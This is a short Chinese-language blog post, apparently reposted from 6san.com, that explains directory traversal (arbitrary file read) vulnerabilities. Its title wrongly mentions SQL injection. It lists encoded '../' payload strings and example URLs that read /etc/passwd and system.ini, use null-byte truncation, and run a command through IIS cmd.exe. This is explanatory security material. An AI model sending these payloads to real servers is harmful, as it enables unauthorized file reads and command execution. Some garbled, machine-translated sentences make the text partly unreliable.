sql注入漏洞版权声明

“目录遍历漏洞”是指在URL或在参数中构造“../”，或“../和类似的交叉父目录字符串。ASCII编码、unicode代码等，为了完成目录跳转，读取操作系统下每个目录下的敏感文件，也可以称之为“任意文件读取漏洞”。

../
..%2F
/%c0%ae%c0%ae/
%2e%2e%2f
..\
..//

目录遍历漏洞原理：程序不能充分过滤用户输入。../目录跳转字符(如目录跳转)使用户通过提交目录跳转来遍历服务器上的任何文件。使用多个..象征，不断向上跳跃，最终停留在根部/，通过绝对路径读取任何文件。

目录遍历漏洞示例和测试：
http://210.151.85.128/../../../../../../../../../etc/passwd

http://www.test.com/my.jsp?file=../../Windows/system.ini

//借助“%00空字符截断是一种更经典的攻击技术。
http://www.test.com/my.jsp?file=../../Windows/system.ini%00.js

//使用了IIS使用脚本目录移动目录并执行指令。
http://server.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c:\

构造url然后使用浏览器直接访问，或使用。web当然，漏洞扫描工具检测也可以编写程序测试

请注明转载的来源: 6san.com
原文地址: http://www.6san.com/1226/